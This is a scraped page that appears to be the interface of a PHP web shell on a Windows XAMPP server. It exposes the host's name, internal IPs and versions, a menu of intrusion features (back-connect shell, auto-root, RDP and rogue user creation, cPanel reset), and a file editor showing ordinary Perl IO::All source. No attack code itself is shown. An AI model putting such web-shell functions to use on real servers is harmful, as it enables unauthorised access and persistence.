Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
IO /
All /
[ HOME SHELL ]
Name
Size
Permission
Action
Base.pm
4.65
KB
-rw-rw-rw-
DBM.pm
2.56
KB
-rw-rw-rw-
DBM.pod
266
B
-rw-rw-rw-
Dir.pm
5.38
KB
-rw-rw-rw-
Dir.pod
272
B
-rw-rw-rw-
File.pm
6.27
KB
-rw-rw-rw-
File.pod
268
B
-rw-rw-rw-
Filesys.pm
2.67
KB
-rw-rw-rw-
Filesys.pod
284
B
-rw-rw-rw-
Link.pm
1.15
KB
-rw-rw-rw-
Link.pod
268
B
-rw-rw-rw-
MLDBM.pm
986
B
-rw-rw-rw-
MLDBM.pod
270
B
-rw-rw-rw-
Pipe.pm
1.18
KB
-rw-rw-rw-
Pipe.pod
268
B
-rw-rw-rw-
STDIO.pm
916
B
-rw-rw-rw-
STDIO.pod
270
B
-rw-rw-rw-
Socket.pm
3.03
KB
-rw-rw-rw-
Socket.pod
272
B
-rw-rw-rw-
String.pm
528
B
-rw-rw-rw-
String.pod
272
B
-rw-rw-rw-
Temp.pm
368
B
-rw-rw-rw-
Temp.pod
278
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Filesys.pm
use strict; use warnings; package IO::All::Filesys; use IO::All::Base -base; use Fcntl qw(:flock); my %spec_map = ( unix => 'Unix', win32 => 'Win32', vms => 'VMS', mac => 'Mac', os2 => 'OS2', ); sub os { my ($self, $type) = @_; my ($v, $d, $f) = $self->_spec_class->splitpath($self->name); my @d = $self->_spec_class->splitdir($d); $self->_spec_class($spec_map{$type}); $self->name( $self->_spec_class->catfile( @d, $f ) ); return $self } sub exists { my $self = shift; -e $self->name } sub filename { my $self = shift; my $filename; (undef, undef, $filename) = $self->splitpath; return $filename; } sub ext { my $self = shift; return $1 if $self->filename =~ m/\.([^\.]+)$/ } { no warnings 'once'; *extension = \&ext; } sub mimetype { require File::MimeInfo; return File::MimeInfo::mimetype($_[0]->filename) } sub is_absolute { my $self = shift; return *$self->{is_absolute} = shift if @_; return *$self->{is_absolute} if defined *$self->{is_absolute}; *$self->{is_absolute} = IO::All::is_absolute($self) ? 1 : 0; } sub is_executable { my $self = shift; -x $self->name } sub is_readable { my $self = shift; -r $self->name } sub is_writable { my $self = shift; -w $self->name } { no warnings 'once'; *is_writeable = \&is_writable; } sub pathname { my $self = shift; return *$self->{pathname} = shift if @_; return *$self->{pathname} if defined *$self->{pathname}; return $self->name; } sub relative { my $self = shift; if (my $base = $_[0]) { $self->pathname(File::Spec->abs2rel($self->pathname, $base)) } elsif ($self->is_absolute) { $self->pathname(File::Spec->abs2rel($self->pathname)) } $self->is_absolute(0); return $self; } sub rename { my $self = shift; my $new = shift; rename($self->name, "$new") ? UNIVERSAL::isa($new, 'IO::All') ? $new : $self->_constructor->($new) : undef; } sub set_lock { my $self = shift; return unless $self->_lock; my $io_handle = $self->io_handle; my $flag = $self->mode =~ /^>>?$/ ? LOCK_EX : LOCK_SH; flock $io_handle, $flag; } sub stat { my $self = shift; return IO::All::stat($self, @_) if $self->is_open; CORE::stat($self->pathname); } sub touch { my $self = shift; $self->utime; } sub unlock { my $self = shift; flock $self->io_handle, LOCK_UN if $self->_lock; } sub utime { my $self = shift; my $atime = shift; my $mtime = shift; $atime = time unless defined $atime; $mtime = $atime unless defined $mtime; utime($atime, $mtime, $self->name); return $self; } 1;
Close